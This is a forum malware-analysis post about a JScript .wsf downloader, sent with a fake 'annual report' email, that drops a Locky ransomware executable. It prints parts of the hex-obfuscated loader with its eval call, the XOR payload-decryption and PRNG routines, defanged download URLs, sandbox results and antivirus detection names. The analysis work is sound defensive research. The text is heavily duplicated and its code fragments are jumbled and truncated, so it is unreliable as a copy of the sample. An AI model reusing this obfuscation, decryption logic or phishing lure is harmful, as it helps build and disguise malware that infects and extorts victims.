- May 14, 2016
- 1,597
I received another fresh sample yesterday (July, 28) :
I suppose it's a new version of the one I analysed on a precedent post (same principal structure once several obfuscated method used are "removed").
I will only write about main changes I saw
For complete details for precedent version (the deobuscaded pdf version will help to follow below quick analysis ) :
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/
Name :
"annual report ~841~..wsf"
I reported it to hybrid-analysis :
This is the VxStream Sandbox Analysis Summary received by mail :
File Name: annual report ~841~..wsf
Analysis State: SUCCESS
Threat Verdict: malicious
Threat Score: 89/100
AV Detection Ratio: n/a
AV Family Name: n/a
Time of analysis: 2016-07-29 03:54:26
File Size (bytes): 56513
File Type: HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
and the virus-total link :
https://www.hybrid-analysis.com/sam...e5d743f18cd7c597ebd17dd3a56?environmentId=100
Quick analysis of changes :
Script language : JScript
They used Unicode Hex Character Code
Example :
'\x76\x61\x72\x20KI\x7a\x20\x3d \x22\x65\x22\x20\x2b\x20\x22\x22\x3b\x0d\x0a'
=> Var KIz = "e" + ""; CRLF [Carriage Return][Line Fed] =>\x0d\x0a => next line
<job>
<script language="JScript">
var aHq = ('\x76\x61\x72\x20KI\x7a\x20\x3d \x22\x65\x22\x20\x2b\x20\x22\x22\x3b\x0d\x0a'+
'\x76\x61r\x20\x51\x52\x770\x20\x3d \x22\x63l\x6fs\x22\x20+\x20\x22'+
'"\x3b\x0d\x0a\x76\x61\x72\x20\x45\x49\x71\x30\x20\x3d\x20\x22\x65\x22\x20\x2b '+
'\x22"\x3b\x0d\x0a\x76\x61\x72\x20T\x56e\x20=\x20\x22o\x46\x69\x6c\x22'+
'\x20\x2b\x20""\x3b\x0d\x0a\x76\x61r\x20D\x61\x20\x3d\x20\x22\x53\x61\x76'+
'\x65\x54" + \x22";\x0d\x0a\x76a\x72\x20\x57\x6a\x20\x3d\x20"'+
'\x78\x74"\x20\x2b\x20\x22"\x3b\x0d\n\x76a\x72\x20Ny\x20\x3d\x20\x22'+
'\x65\x54\x65\x22\x20+\x20"\x22\x3b\x0d\x0a\x76\x61\x72\x20\x57q4\x20\x3d'+
'\x20\x22\x77\x72\x69\x74"\x20\x2b
....
....
'\x4f\x680\x29\x5d\x28\x29\x3b\r\x0a\x7d\x3b').split('').join('');
var QZw1 = aHq;
</script>
<script language="JScript">
eval(QZw1);</script>
</job>
Once this part is decoded :
=> It looks like what I already describe for precedent version.
Characters substitution cipher (two functions) and deobfuscation function, all to make the real exe content, are presents.
Main change : the XOR part in deobfuscation function (used to "decrypt" the payload)
The
for (var index=0; index < file_content_temp.length; index++) {
is now made in first, and is also more complicated :
var QVh1 = uheprng();
for (var index=0; index < file_content_temp.length; index++) {
file_content_temp[index] ^= QVh1(256); // XOR
}
with :
PAYLOAD :
=> classified as Locky.AP.gen (8/53)
https://www.virustotal.com/en/file/...be775a6eba4d1f9ba37e0c86dfaf81ead26/analysis/
%TEMP%/vGDwqGMe6.exe if successfully deobuscated by the js downloader (seen as DOS executable before, without .exe extension)
else no .exe extension (see my analyse of precedent version for details)
URLS found by code analysis (I modified some parts for security purpose) :
hxxp://w_w_w_.pastificiodelduca.com/[name1]
hxxp://fiditra.de/[name2]
hxxp://darkhollowcoffee.com/[name3]
When I submitted this sample to virus-total, i choose to share it to public.
=> Can be downloaded for dynamical analysis (by ours authorized members only )
UPDATED :
KTS, ZAM, Crystal Security detected the downloader :
Trojan-Downloader.JS.Agent.lvk
Script:Generic/Saruth.A!Ieei
Trojan.Script.Heuristic-js.iacgm
JS/Dloader.DRY!tr.dldr
virus.js.gen.80
KTS, ZAM, Crystal Security & VoodooShield detected the payload :
Trojan:Win32/Goorka.A!Emaa
Win32.Trojan.WisdomEyes.151026.9950.9993
W32/Locky.AP.gen!Eldorado
Trojan/Win32.Locky.N2064104393
BScope.P2P-Worm.Palevo
QVM20.1.Malware.Gen
"Hi DardiM,
Speaking of the event, I attached the annual report that we discussed about
Best regards
Stacy Landry"
Speaking of the event, I attached the annual report that we discussed about
Best regards
Stacy Landry"
I suppose it's a new version of the one I analysed on a precedent post (same principal structure once several obfuscated method used are "removed").
I will only write about main changes I saw
For complete details for precedent version (the deobuscaded pdf version will help to follow below quick analysis ) :
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/
Name :
"annual report ~841~..wsf"
I reported it to hybrid-analysis :
This is the VxStream Sandbox Analysis Summary received by mail :
File Name: annual report ~841~..wsf
Analysis State: SUCCESS
Threat Verdict: malicious
Threat Score: 89/100
AV Detection Ratio: n/a
AV Family Name: n/a
Time of analysis: 2016-07-29 03:54:26
File Size (bytes): 56513
File Type: HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
and the virus-total link :
https://www.hybrid-analysis.com/sam...e5d743f18cd7c597ebd17dd3a56?environmentId=100
Quick analysis of changes :
Script language : JScript
They used Unicode Hex Character Code
Example :
'\x76\x61\x72\x20KI\x7a\x20\x3d \x22\x65\x22\x20\x2b\x20\x22\x22\x3b\x0d\x0a'
=> Var KIz = "e" + ""; CRLF [Carriage Return][Line Fed] =>\x0d\x0a => next line
<job>
<script language="JScript">
var aHq = ('\x76\x61\x72\x20KI\x7a\x20\x3d \x22\x65\x22\x20\x2b\x20\x22\x22\x3b\x0d\x0a'+
'\x76\x61r\x20\x51\x52\x770\x20\x3d \x22\x63l\x6fs\x22\x20+\x20\x22'+
'"\x3b\x0d\x0a\x76\x61\x72\x20\x45\x49\x71\x30\x20\x3d\x20\x22\x65\x22\x20\x2b '+
'\x22"\x3b\x0d\x0a\x76\x61\x72\x20T\x56e\x20=\x20\x22o\x46\x69\x6c\x22'+
'\x20\x2b\x20""\x3b\x0d\x0a\x76\x61r\x20D\x61\x20\x3d\x20\x22\x53\x61\x76'+
'\x65\x54" + \x22";\x0d\x0a\x76a\x72\x20\x57\x6a\x20\x3d\x20"'+
'\x78\x74"\x20\x2b\x20\x22"\x3b\x0d\n\x76a\x72\x20Ny\x20\x3d\x20\x22'+
'\x65\x54\x65\x22\x20+\x20"\x22\x3b\x0d\x0a\x76\x61\x72\x20\x57q4\x20\x3d'+
'\x20\x22\x77\x72\x69\x74"\x20\x2b
....
....
'\x4f\x680\x29\x5d\x28\x29\x3b\r\x0a\x7d\x3b').split('').join('');
var QZw1 = aHq;
</script>
<script language="JScript">
eval(QZw1);</script>
</job>
Once this part is decoded :
=> It looks like what I already describe for precedent version.
Characters substitution cipher (two functions) and deobfuscation function, all to make the real exe content, are presents.
Main change : the XOR part in deobfuscation function (used to "decrypt" the payload)
function deobfuscation(file_content_temp) {
// - Bitwise inclusive OR operation and Shift Operators
// - chars removed
// - reverse
// - bitwise exclusive OR operation (XOR)
//- modulo
}
var number;
var NJx3=file_content_temp[file_content_temp.length - 4] |
file_content_temp[file_content_temp.length - 3] << 8 |
file_content_temp[file_content_temp.length - 2] << 16 |
file_content_temp[file_content_temp.length - 1] << 24;
file_content_temp.splice(file_content_temp.length - 4, 4);
// remove 4 last chars from content
number=22;
for (var index=0; index < file_content_temp.length; index++) {
if (number != NJx3) { return []; };
number=21;
file_content_temp=file_content_temp.reverse();
for (var index=0; index < file_content_temp.length; index++) {
return file_content_temp;
// content_file_temp Modified :var NJx3=file_content_temp[file_content_temp.length - 4] |
file_content_temp[file_content_temp.length - 3] << 8 |
file_content_temp[file_content_temp.length - 2] << 16 |
file_content_temp[file_content_temp.length - 1] << 24;
file_content_temp.splice(file_content_temp.length - 4, 4);
// remove 4 last chars from content
number=22;
for (var index=0; index < file_content_temp.length; index++) {
number=(number + file_content_temp[index]) % 0x100000000;
}if (number != NJx3) { return []; };
number=21;
file_content_temp=file_content_temp.reverse();
for (var index=0; index < file_content_temp.length; index++) {
file_content_temp[index] ^= number; // XOR
number=(number + 5) % 256;
}number=(number + 5) % 256;
return file_content_temp;
// - Bitwise inclusive OR operation and Shift Operators
// - chars removed
// - reverse
// - bitwise exclusive OR operation (XOR)
//- modulo
}
for (var index=0; index < file_content_temp.length; index++) {
file_content_temp[index] ^= number; // XOR
number=(number + 5) % 256;
}number=(number + 5) % 256;
is now made in first, and is also more complicated :
var QVh1 = uheprng();
for (var index=0; index < file_content_temp.length; index++) {
file_content_temp[index] ^= QVh1(256); // XOR
}
with :
function uheprng() {
function Mash() {
}
return (function() {
}());
};var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 1 * 0; i < o; i++) s = mash(384267);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function rawprng() {
return random;c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 1 * 0; i < o; i++) s = mash(384267);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function rawprng() {
if (++p >= o) p = 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}());
function Mash() {
var n = 0xefc8249d;
var mash = function(data) {
return mash;var mash = function(data) {
if (data) {
n = 0xefc8249d;
};data = data.toString();
for (var i = -8257 + 8257; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} elsefor (var i = -8257 + 8257; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
n = 0xefc8249d;
}
PAYLOAD :
=> classified as Locky.AP.gen (8/53)
https://www.virustotal.com/en/file/...be775a6eba4d1f9ba37e0c86dfaf81ead26/analysis/
%TEMP%/vGDwqGMe6.exe if successfully deobuscated by the js downloader (seen as DOS executable before, without .exe extension)
else no .exe extension (see my analyse of precedent version for details)
URLS found by code analysis (I modified some parts for security purpose) :
hxxp://w_w_w_.pastificiodelduca.com/[name1]
hxxp://fiditra.de/[name2]
hxxp://darkhollowcoffee.com/[name3]
When I submitted this sample to virus-total, i choose to share it to public.
=> Can be downloaded for dynamical analysis (by ours authorized members only )
UPDATED :
KTS, ZAM, Crystal Security detected the downloader :
Trojan-Downloader.JS.Agent.lvk
Script:Generic/Saruth.A!Ieei
Trojan.Script.Heuristic-js.iacgm
JS/Dloader.DRY!tr.dldr
virus.js.gen.80
KTS, ZAM, Crystal Security & VoodooShield detected the payload :
Trojan:Win32/Goorka.A!Emaa
Win32.Trojan.WisdomEyes.151026.9950.9993
W32/Locky.AP.gen!Eldorado
Trojan/Win32.Locky.N2064104393
BScope.P2P-Worm.Palevo
QVM20.1.Malware.Gen
Last edited by a moderator: